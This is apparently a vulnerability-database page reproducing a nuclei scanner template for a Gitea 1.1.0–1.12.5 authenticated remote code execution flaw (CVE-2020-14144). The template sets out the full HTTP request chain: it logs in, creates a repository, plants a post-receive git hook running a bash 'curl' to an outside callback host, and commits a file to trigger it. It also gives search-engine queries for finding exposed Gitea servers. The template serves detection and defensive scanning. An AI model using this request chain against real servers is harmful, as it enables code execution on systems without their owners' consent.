Lucene search

Gitea 1.1.0 - 1.12.5 - Remote Code Execution

🗓️ 18 Mar 2023 22:09:07Reported by ProjectDiscoveryType

nuclei🔗 github.com👁 811 Views

Gitea 1.1.0 - 1.12.5 Remote Code Execution vulnerability in git hook functionalit

Reporter	Title	Published	Views	Family All 22
AttackerKB	CVE-2020-14144	16 Oct 202000:00	–	attackerkb
AttackerKB	CVE-2020-15867	16 Oct 202000:00	–	attackerkb
Prion	Design/Logic Flaw	16 Oct 202014:15	–	prion
Github Security Blog	Arbitrary Code Execution in Gitea	22 Apr 202419:07	–	github
Veracode	Remote Code Execution (RCE)	19 Oct 202007:10	–	veracode
GitLab Advisory Database	Arbitrary Code Execution in Gitea	22 Apr 202400:00	–	gitlab
OpenVAS	Gitea >= 1.1.0, <= 1.12.5 RCE Vulnerability	28 Oct 202000:00	–	openvas
Exploit DB	Gitea 1.12.5 - Remote Code Execution (Authenticated)	18 Feb 202100:00	–	exploitdb
Packet Storm	Gitea 1.12.5 Remote Code Execution	18 Feb 202100:00	–	packetstorm
Packet Storm	Gitea Git Hooks Remote Code Execution	7 Apr 202100:00	–	packetstorm

Source	Link
dl	www.dl.gitea.io/gitea/1.16.6
github	www.github.com/go-gitea/gitea/pull/13058
fzi	www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
nvd	www.nvd.nist.gov/vuln/detail/CVE-2020-14144
docs	www.docs.github.com/en/[email protected]/admin/policies/creating-a-pre-receive-hook-script

id: CVE-2020-14144

info:
  name: Gitea 1.1.0 - 1.12.5 - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides."
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: Fixed in version 1.16.7.
  reference:
    - https://dl.gitea.io/gitea/1.16.6
    - https://github.com/go-gitea/gitea/pull/13058
    - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14144
    - https://docs.github.com/en/[email protected]/admin/policies/creating-a-pre-receive-hook-script
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2020-14144
    cwe-id: CWE-78
    epss-score: 0.97279
    epss-percentile: 0.9986
    cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: gitea
    product: gitea
    shodan-query:
      - html:"Powered by Gitea Version"
      - http.html:"powered by gitea version"
      - http.title:"gitea"
      - cpe:"cpe:2.3:a:gitea:gitea"
    fofa-query:
      - body="powered by gitea version"
      - title="gitea"
    google-query: intitle:"gitea"
  tags: cve2020,cve,rce,gitea,authenticated,git,intrusive

http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
      - |
        GET /repo/create HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /repo/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master
      - |
        POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
      - |
        GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: body_1
        words:
          - "Gitea:"

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - name="_csrf" value="(.*)"
        internal: true

      - type: regex
        name: auth_csrf
        group: 1
        regex:
          - name="_csrf" content="(.*)"
        internal: true

      - type: regex
        name: last_commit
        group: 1
        regex:
          - name="last_commit" value="(.*)"
        internal: true
# digest: 4a0a00473045022100d3202ff88b17e974f4cafcbf32159fbfb0cb21885ca095ca00685bce1644aefc0220076974f88118b0379d27457883d1c853dd8f11679238a04686335774fd6ae912:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

18 Mar 2023 22:07Current

7.1High risk

Vulners AI Score7.1

CVSS26.5

CVSS37.2

EPSS0.93389